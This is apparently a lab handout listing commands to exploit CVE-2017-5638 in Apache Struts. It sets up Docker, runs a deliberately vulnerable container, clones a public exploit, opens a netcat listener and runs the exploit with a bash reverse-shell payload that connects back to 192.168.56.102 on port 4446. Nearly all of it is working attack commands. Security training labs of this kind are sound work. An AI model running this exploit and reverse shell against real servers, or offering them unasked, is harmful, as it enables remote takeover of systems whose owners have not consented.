Here below, are the links and commands needed for this lab.


curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list
apt-get update
apt-get remove docker docker-engine docker.io
apt-get install docker-ce
service docker start
docker run hello-world

docker run -d -p 8080:8080 jrrdev/cve-2017-5638:latest

git clone https://github.com/jrrdev/cve-2017-5638.git

nc -nlvp 4446

python exploit.py http://localhost:8080/hello "bash -i >& /dev/tcp/192.168.56.102/4446 0>&1"

URLs:

N/A